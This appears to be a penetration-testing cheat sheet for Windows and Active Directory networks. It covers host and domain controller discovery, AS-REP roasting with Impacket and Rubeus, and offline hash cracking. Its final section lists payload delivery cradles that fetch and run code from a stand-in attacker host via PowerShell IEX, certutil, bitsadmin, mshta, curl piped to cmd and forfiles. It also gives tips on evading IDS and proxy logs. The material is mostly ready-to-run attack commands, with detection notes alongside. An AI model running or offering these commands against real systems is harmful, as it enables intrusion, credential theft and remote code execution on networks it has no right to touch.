Initial Access & Reconnaissance#
Host Discovery#
ARP Scan (Local Subnet)#
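# arp-scan: sends an ARP request to every address in the interface's subnet.
# -l / --localnet: derive the target range from the interface's own address/netmask
# -I: bind to this interface. Required on multi-homed hosts; otherwise arp-scan
#     picks the first configured non-loopback interface and you may sweep the
#     wrong segment.
# -q: quiet - print only IP and MAC per responding host (the original text
#     documented this flag but never used it; see the second command).
# Needs root (raw sockets). ARP never crosses a router: only the directly
# attached L2 segment is discovered.
sudo arp-scan -l -I eth0
# Same scan, minimal output (easy to feed into a hosts file)
sudo arp-scan -l -I eth0 -q
# Passive alternative: read the kernel neighbour table instead of sending probes.
# Quiet, but it only lists hosts this machine has already exchanged traffic with,
# so treat it as a first look, not a complete inventory.
ip neigh show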
Nmap Ping Scan#
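# nmap host discovery.
# NOTE: on a directly attached Ethernet segment nmap uses ARP for -sn no matter
# which -P* probes are given, because ARP is faster and more reliable. The
# ICMP/TCP probes below only come into play for routed targets, or locally
# when --disable-arp-ping is set.
# -sn:      host discovery only, no port scan
# -PE:      ICMP echo request          -PP: ICMP timestamp request (often filtered)
# -PS443:   TCP SYN to 443              -PA80: TCP ACK to 80 (raw sockets -> sudo)
# --min-rate 1000 / -T4: fast. This is the loud baseline, not a stealth option.
# -oA:      normal + grepable + XML output. nmap does not create the directory,
#           so "nmap/" must exist or the scan aborts before sending a packet.
mkdir -p nmap
sudo nmap -sn -PE -PP -PS443 -PA80 --min-rate 1000 -T4 10.10.10.0/24 -oA nmap/ping_scan
# Lower-profile variant: TCP-only probes on ports that look like ordinary web
# traffic, randomised host order and the "polite" timing template.
# --disable-arp-ping: skip ARP on local segments (ARP bursts are trivial to
#   attribute at L2); the IP-level probes above are used instead.
# --randomize-hosts: avoid the obvious sequential sweep.
# Slower, and a per-source threshold on an IDS will still add it up over time.
sudo nmap -sn -PS443,8443 -PA80,8080 --disable-arp-ping --randomize-hosts -T2 10.10.10.0/24 -oA nmap/stealth_scan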
Masscan (Large Scale Internet Scans)#
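# masscan: asynchronous scanner with its own user-space TCP/IP stack. Very fast
# and very loud - the packet rate, not the port list, is what trips rate-based
# IDS and upstream flow monitoring.
# -p:            ports
# --rate:        packets per second; tune to your bandwidth AND to the target's
#                alerting thresholds
# --banners:     complete the handshake and grab banners (more detectable). Because
#                the kernel also sees the SYN-ACK it will RST the connection masscan
#                opened; masscan's docs cover using --source-ip or a firewall rule
#                for this.
# --exclude:     a single range to skip; --excludefile: a file of ranges (client
#                out-of-scope list, your own infrastructure). The original text
#                documented --exclude but the commands use --excludefile; both exist.
# -oL:           simple list output   -oJ: JSON (easier to feed into other tooling)
sudo masscan 10.10.10.0/24 -p80,443,3389,445 --rate=2000 -oL masscan_results.txt
# Same scan at a quarter of the rate, with the exclusion list and JSON output.
# Keep the exclude file on every run: scope does not change with the rate.
sudo masscan 10.10.10.0/24 -p80,443 --rate=500 --excludefile exclude.txt -oJ masscan.json
# RustScan: quick port sweep, then hands the open ports to nmap. Everything after
# "--" is passed to nmap verbatim, so -sV here makes nmap run version probes
# (full connections, service-specific payloads) against every open port found.
rustscan -a 10.10.10.0/24 -p 80,443,3389 -- -sV -oA rustscan_output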
Domain Controller Discovery#
PowerShell (AD Module)#
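# Get-ADDomainController lives in the RSAT ActiveDirectory module. It is usually
# present on DCs and admin workstations, NOT on ordinary member hosts. Silently
# continuing past a failed import only moves the error to the next line as an
# unhelpful "cmdlet not recognized", so check and fail loudly here instead.
if (-not (Get-Module -ListAvailable -Name ActiveDirectory)) {
    Write-Warning 'ActiveDirectory module not available; use the DNS / .NET methods instead'
}
Import-Module ActiveDirectory -ErrorAction Stop
# Locate any DC for the current domain (DC locator call, not a directory search)
Get-ADDomainController -Discover
# Locate the DC holding the PDC emulator FSMO role (password changes, lockout
# processing and the domain time source funnel through it)
Get-ADDomainController -Discover -Service PrimaryDC
# Enumerate every DC with a few identifying properties. Unlike -Discover this
# is a query against the directory (the AD module talks to the DC's web service).
Get-ADDomainController -Filter * | Select-Object Name, IPv4Address, OperatingSystem
# Same locator call for another domain in the forest or a trusted domain
Get-ADDomainController -Discover -DomainName contoso.local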
Built-in Binaries#
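:: These run from cmd.exe, so comments use :: (the original "#" lines would be
:: executed and fail with "'#' is not recognized" in a batch file).
:: nltest ships with every Windows client/server; lists DCs via the DC locator
nltest /dclist:contoso.local
:: SRV records the DC locator itself relies on. Works from a non-domain-joined
:: host as long as the resolver in use can answer for the domain zone - point
:: nslookup at a DC or the corporate DNS server if your resolver cannot:
::   nslookup -type=SRV _ldap._tcp.dc._msdcs.contoso.local 10.10.10.5
nslookup -type=SRV _ldap._tcp.dc._msdcs.contoso.local
:: KDCs and the PDC emulator have their own SRV records
nslookup -type=SRV _kerberos._tcp.dc._msdcs.contoso.local
nslookup -type=SRV _ldap._tcp.pdc._msdcs.contoso.local
:: The DC that authenticated this logon session - read from the environment,
:: no network traffic at all. "set log" prints every variable whose name starts
:: with LOG; query the exact name to avoid noise.
set LOGONSERVER
echo %LOGONSERVER%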
PowerShell (Without AD Module)#
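# DNS-only discovery: no AD module, works from non-domain-joined hosts provided
# the resolver can answer for the zone (add -Server <DC-or-corp-DNS> otherwise).
# BUG FIX: SRV record objects expose the host as NameTarget, not Target, so the
# original "Select-Object Name, Target, Port" returned an empty Target column.
Resolve-DnsName -Name _ldap._tcp.dc._msdcs.contoso.local -Type SRV |
    Select-Object Name, NameTarget, Port, Priority, Weight
# DC that authenticated the current session - environment only, no traffic
$env:LOGONSERVER
# .NET directory classes: present on every PowerShell version, no module needed.
# This does contact the domain to enumerate the controllers.
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers |
    Select-Object Name, IPAddress
# WMI/CIM view of the domain(s) this host is joined to. Get-WmiObject was removed
# in PowerShell 7; Get-CimInstance is the drop-in on both 5.1 and 7.
# Lower-profile only in the sense that it is a local WMI query rather than
# directory traffic - confirm against your own telemetry before relying on that.
(Get-CimInstance -ClassName Win32_NTDomain).DomainControllerName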
AS-REP Roasting#
AS-REP roasting targets accounts with the "Do not require Kerberos preauthentication" flag set. For such an account the KDC answers an AS-REQ that carries no proof of the password with an AS-REP whose encrypted part is keyed from the user's password hash; that blob can be cracked offline. No bad credentials are ever sent, so the attempt does not count against lockout thresholds, but each request is still a Kerberos authentication event (4768) on the DC.
Impacket (GetNPUsers.py)#
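# Unauthenticated mode: one AS-REQ per name in -usersfile. Every probe is a
# 4768 event on the DC, and a probe for a non-existent user comes back as
# "principal unknown", so a big wordlist is both a username-enumeration oracle
# and a lot of log lines. Enumerate users first and keep the list short.
# -usersfile:  candidate usernames
# -dc-ip:      send Kerberos to this DC directly instead of resolving the KDC via DNS
# -format:     hashcat or john output           -no-pass: don't prompt for a password
# -outputfile: append hashes here (they are also printed to stdout)
impacket-GetNPUsers contoso.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 10.10.10.5 -no-pass
# Single user: one AS-REQ, one log entry
impacket-GetNPUsers contoso.local/username -no-pass -dc-ip 10.10.10.5
# Authenticated mode: bind to the DC with real credentials, search for accounts
# with DONT_REQ_PREAUTH set, then -request an AS-REP for each one found. The
# Kerberos traffic looks like normal authentication; the LDAP search is what a
# defender watching UserAccountControl queries will see.
# Leave the password off the command line - Impacket prompts for it, which
# keeps it out of `ps`, shell history and any process-creation telemetry.
impacket-GetNPUsers contoso.local/validuser -request -format hashcat -outputfile asrep.txt -dc-ip 10.10.10.5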
Rubeus#
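# Rubeus asreproast: without /user it searches LDAP for accounts with
# DONT_REQ_PREAUTH set and requests an AS-REP for each. It runs in the context
# of the current logon, so the host must be domain-joined (or supply /domain,
# /dc and /creds). /format:hashcat emits the $krb5asrep$23$ form that hashcat
# mode 18200 expects.
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt /format:hashcat
# One target: narrows the search to that account (with /domain and /dc given,
# Rubeus can skip the LDAP lookup entirely) - a single AS-REQ on the wire
.\Rubeus.exe asreproast /user:targetuser /format:hashcat
# Pin the DC: avoids the locator round-trip, useful when only one DC is reachable
.\Rubeus.exe asreproast /dc:DC01.contoso.local /format:hashcat /outfile:hashes.txt
# /nowrap prints each hash on a single line so it survives copy/paste from a
# console or C2 output. The original comment ("combine with user enumeration")
# was wrong - this flag only changes formatting.
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt /nowrap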
Crack Hashes#
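# hashcat mode 18200 = Kerberos 5 AS-REP, etype 23 (RC4-HMAC). That is the
# $krb5asrep$23$ line GetNPUsers/Rubeus produce by default. If the account or
# domain has RC4 disabled you get an AES (etype 17/18) AS-REP instead, which
# needs a different mode - check `hashcat --help | grep -i 'AS-REP'` for the
# number in your hashcat version rather than forcing 18200.
# -O: optimised kernels. Faster, but caps the candidate password length (the
# cap is mode-specific, around 31 chars here); drop it for long passphrases.
hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt -O
# Rule-based mangling of the wordlist; best64 is a reasonable first pass
hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt -r rules/best64.rule
# John: the krb5asrep format reads the same $krb5asrep$ lines
john --wordlist=/path/to/wordlist.txt --format=krb5asrep asrep_hashes.txt
# Cracked passwords are persisted in the potfile (hashcat.potfile next to the
# binary or under ~/.local/share/hashcat/, ~/.john/john.pot) and --show reads
# from there. Those files are cleartext domain credentials - protect them
# during the engagement and wipe them at the end.
hashcat -m 18200 asrep_hashes.txt --show
john --show --format=krb5asrep asrep_hashes.txt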
File Transfer & Payload Delivery#
PowerShell#
In-Memory Download & Execution#
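# Everything handed to Invoke-Expression (IEX) goes through AMSI and is written
# to the script block log (event 4104) in clear text. User-Agent tricks and
# -ep bypass change nothing about that; the variants below only differ in what
# the network and the process-creation log see.
# Windows PowerShell 5.1 may negotiate TLS 1.0/1.1 by default and will refuse a
# self-signed listener certificate. Pin the protocol up front and serve a cert
# the host trusts (or knowingly relax validation).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
try {
    # DownloadString throws a terminating WebException on HTTP/TLS errors, so
    # the catch genuinely fires (a non-terminating error would skip it)
    $script = (New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/script.ps1')
    Invoke-Expression $script
} catch {
    Write-Error "Download failed: $_"
}
# Invoke-RestMethod uses the same .NET TLS stack as WebClient, so "better HTTPS"
# is not a real difference. What it adds is cmdlet-level proxy handling
# (-Proxy, -ProxyUseDefaultCredentials) and it returns the body as a string.
IEX (Invoke-RestMethod -Uri 'https://<ATTACKER_IP>/script.ps1')
# WebClient sends no User-Agent at all by default, which stands out in proxy
# logs; a browser-like string blends in at the network layer only.
$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
IEX ($wc.DownloadString('https://<ATTACKER_IP>/script.ps1'))
# Execution policy is not a security boundary; -ep bypass just skips it for this
# process. Spawning powershell.exe with this command line is itself a
# high-signal event: 4688 / Sysmon 1 record the full command.
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/script.ps1')"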
File Downloads#
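# Plain WebClient download. DownloadFile fails with a WebException if the
# destination directory is missing - C:\Users\Public always exists, C:\temp
# usually does not, so create it first (done below before the C:\temp writes).
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>/payload.exe', 'C:\Users\Public\payload.exe')
# Invoke-WebRequest shares the .NET TLS stack with WebClient. On Windows
# PowerShell 5.1 add -UseBasicParsing: without it the cmdlet may drive the IE
# DOM parser, which errors on hosts where IE first-run setup never happened.
# -OutFile writes the raw bytes, so binaries are fine.
Invoke-WebRequest -Uri 'https://<ATTACKER_IP>/payload.exe' -OutFile 'C:\Users\Public\payload.exe' -UseBasicParsing
# Through an authenticating corporate proxy. WebClient already picks up the
# system proxy; what it lacks is credentials. DefaultNetworkCredentials sends
# the current user's Windows credentials (NTLM/Kerberos) to the proxy - that
# proxy auth shows up in the proxy's logs under the user's name.
New-Item -ItemType Directory -Path 'C:\temp' -Force | Out-Null
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$wc.DownloadFile('https://<ATTACKER_IP>/payload.exe', 'C:\temp\payload.exe')
# iwr is the alias for Invoke-WebRequest (PowerShell 3.0+); identical behaviour
iwr -Uri 'https://<ATTACKER_IP>/file.exe' -OutFile 'C:\temp\file.exe' -UseBasicParsing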
One-Liners#
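# Classic download cradles. They still work, and they are exactly what AMSI,
# EDR signatures and script block logging (4104) are tuned for.
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/script.ps1')
# -UseBasicParsing avoids the IE DOM parser on 5.1; .Content is the body string
IEX (IWR -Uri http://<ATTACKER_IP>/script.ps1 -UseBasicParsing).Content
# Base64 hides the literal command from naive string matching on the command
# line only: the decoded text is still passed to IEX, so AMSI and the script
# block log see it in clear. The encoding must be UTF-16LE ("Unicode"), the
# same encoding powershell.exe -EncodedCommand expects. Build the blob with:
#   [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('<command>'))
$cmd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND'))
IEX $cmd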
Living Off The Land Binaries (LOLBins)#
certutil.exe#
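:: certutil -urlcache -f fetches over WinINET (IE proxy settings apply); -split
:: writes the response body to the named file. This exact pattern is in the
:: default signature set of most AV/EDR - expect the fetch itself to be flagged.
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/payload.exe C:\Users\Public\payload.exe
:: -decode accepts base64 with or without the -----BEGIN/END CERTIFICATE-----
:: wrapper that -encode adds; handy when the transport only allows text
certutil.exe -decode C:\temp\payload.b64 C:\temp\payload.exe
:: -encode wraps the output in BEGIN/END CERTIFICATE lines and 64-char rows.
:: Strip the wrapper (or have the receiver do it) before decoding with other tools.
certutil.exe -encode C:\temp\data.txt C:\temp\data.b64
:: Clears certutil's own URL cache only. It does nothing about proxy logs,
:: the event log or the file you just wrote.
certutil.exe -urlcache * delete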
bitsadmin.exe#
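:: One-shot BITS download. Every job is recorded in the BITS client event log
:: (Microsoft-Windows-Bits-Client/Operational) and the qmgr job database.
:: bitsadmin.exe is deprecated but still shipped with current Windows.
bitsadmin /transfer myJob /download /priority normal http://<ATTACKER_IP>/payload.exe C:\Users\Public\payload.exe
:: Step-by-step job: /addfile can be repeated to queue several files, and you
:: control when it runs. /complete is mandatory - until then the download sits
:: as a .tmp file and the job stays queued (retried by the BITS service, and it
:: survives reboots, which is why stale jobs are a forensic artefact).
bitsadmin /create myJob
bitsadmin /addfile myJob http://<ATTACKER_IP>/file.exe C:\temp\file.exe
bitsadmin /resume myJob
bitsadmin /complete myJob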
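# PowerShell front end to the same BITS service (this is PowerShell, so the
# comment marker is # - the original "::" would not parse here). It produces
# the same BITS event log entries and job-database records as bitsadmin; the
# only difference is that no bitsadmin.exe process is spawned. -Asynchronous
# followed by Complete-BitsTransfer mirrors bitsadmin's create/resume/complete.
Start-BitsTransfer -Source http://<ATTACKER_IP>/file.exe -Destination C:\temp\file.exe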
mshta.exe#
mshta.exe runs HTA (HTML Application) files, from disk or straight from a URL, and executes their embedded VBScript/JScript outside the browser sandbox with the launching user's privileges.
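:: mshta fetches the HTA over WinINET (IE proxy/zone settings apply) and runs its
:: VBScript/JScript in the caller's user context. Hardened environments commonly
:: block mshta via AppLocker/WDAC, so expect it to be blocked or alerted on.
mshta.exe http://<ATTACKER_IP>/payload.hta
:: Inline VBScript, nothing fetched. Doubled quotes are VBScript string escaping;
:: ",0" runs cmd.exe with a hidden window and the trailing ":close" closes the
:: HTA window once Run returns. The whole script is visible in process-creation
:: logs (4688 / Sysmon 1), which is the primary detection for this form.
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""cmd.exe"",0:close")
:: JScript form. This example only pops a dialog: a harmless test of whether
:: mshta is allowed to run at all.
mshta.exe javascript:alert('test');close();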
Additional Modern LOLBins#
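:: curl.exe ships with Windows 10 1803+ / Server 2019+. From cmd "curl" is the
:: binary; from Windows PowerShell 5.1 "curl" is an alias for Invoke-WebRequest,
:: so always write curl.exe there. Windows curl uses Schannel: a self-signed
:: listener cert needs -k (or --ssl-no-revoke when revocation checks are what fails).
:: -sS: quiet but still report errors; -f: fail on HTTP errors instead of
:: saving an error page under the name "file.exe"
curl.exe -sSf -o C:\temp\file.exe http://<ATTACKER_IP>/file.exe
:: tar.exe (bsdtar, Windows 10+): unpack a compressed bundle after download.
:: The -C target directory must already exist.
curl.exe -sSf -o C:\temp\archive.tar.gz http://<ATTACKER_IP>/archive.tar.gz
tar.exe -xf C:\temp\archive.tar.gz -C C:\temp\
:: expand.exe extracts CAB files, here straight from a UNC path. That makes the
:: host authenticate to the attacker's SMB share (NetNTLM on the wire, under the
:: current user), and outbound 445 is normally blocked at the egress firewall -
:: so this is an internal-pivot technique, not internet-facing delivery.
expand.exe \\<ATTACKER_IP>\share\payload.cab -F:* C:\temp\
:: forfiles runs its /c command once per matching file; matching exactly one
:: file (cmd.exe in System32) turns it into an indirect launcher, which is why it
:: is on the LOLBAS list as a parent-process / AppLocker evasion in some
:: configurations. The piped script runs in memory and nothing is written to
:: disk, but the full command line is still captured by 4688 / Sysmon 1.
forfiles /p C:\Windows\System32 /m cmd.exe /c "cmd.exe /c curl http://<ATTACKER_IP>/script.bat | cmd"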